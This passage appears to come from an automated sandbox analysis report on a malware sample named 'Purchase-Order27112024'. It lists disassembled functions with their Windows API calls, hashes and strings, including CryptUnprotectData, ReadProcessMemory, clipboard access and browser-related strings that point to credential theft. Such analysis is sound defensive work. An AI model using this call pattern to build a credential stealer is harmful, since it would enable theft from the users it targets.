                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                      • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3655998216-0
                                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1828521557-0
                                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 609303285-0
                                                                                                      • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                      • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2136311172-0
                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1936579350-0
                                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
